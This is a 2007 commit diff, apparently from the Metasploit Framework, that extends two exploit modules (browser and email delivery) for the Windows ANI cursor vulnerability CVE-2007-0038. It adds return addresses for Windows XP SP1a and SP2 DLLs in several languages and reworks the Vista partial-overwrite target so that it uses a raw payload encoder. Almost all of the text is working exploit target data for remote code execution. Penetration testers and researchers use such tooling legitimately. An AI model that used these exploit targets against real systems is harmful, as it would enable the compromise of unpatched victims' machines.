Fixes #87. Adds new targets to the ANI exploits, fixes Vista target for OE

git-svn-id: file:///home/svn/framework3/trunk@4795 4d416f70-5f16-0410-b530-b9f4589650da
2007-04-28 18:32:36 +00:00 · 2007-04-28 18:32:36 +00:00 · 7d7f244bf6
parent ca1f4f5cdc
commit 7d7f244bf6
2 changed files with 42 additions and 8 deletions
--- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
@ -96,16 +96,37 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 					
 					# Should work for English 2000 SP0-SP4+
 					[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],					
-
-
+					
 					#
 					# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start 
 					# of the RIFF chunk itself.  The length field of the RIFF chunk
 					# tag contains a short jump into an embedded riff chunk that
 					# makes a long relative jump into the actual payload.
 					#
-					[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
-
+					[ 'Windows Vista user32.dll 6.0.6000.16386', 
+					  { 
+					     'Ret'         => 0x700b, 
+					     'Len'         => 2,
+						  
+					     # On Vista, the pages that contain the RIFF are read-only.
+					     # In-place decoders cannot be used.
+					     'Payload'     => { 'EncoderType' => Msf::Encoder::Type::Raw }
+					  } 
+					],
+										
+					#
+					# Supplied by ramon[at]risesecurity.org
+					#
+					
+					# call [ebx+4]
+					[ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }],
+					[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],
+					[ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }],
+					[ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }],
+					
+    				# call [esi+4]
+					[ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }],
+					[ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }]
 				],
 			'DisclosureDate' => 'Mar 28 2007',
 			'DefaultTarget'  => 0))
--- a/modules/exploits/windows/email/ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/email/ani_loadimage_chunksize.rb
@ -94,9 +94,8 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 					[ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }],					
 					
 					# Should work for English 2000 SP0-SP4+
-					[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],					
-
-
+					[ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],
+									
 					#
 					# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start 
 					# of the RIFF chunk itself.  The length field of the RIFF chunk
@ -112,7 +111,21 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 					     # In-place decoders cannot be used.
 					     'Payload'     => { 'EncoderType' => Msf::Encoder::Type::Raw }
 					  } 
-					]
+					],
+										
+					#
+					# Supplied by ramon[at]risesecurity.org
+					#
+					
+					# call [ebx+4]
+					[ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }],
+					[ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],
+					[ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }],
+					[ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }],
+					
+    				# call [esi+4]
+					[ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }],
+					[ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }]
 				],
 			'DisclosureDate' => 'Mar 28 2007',
 			'DefaultTarget' => 0))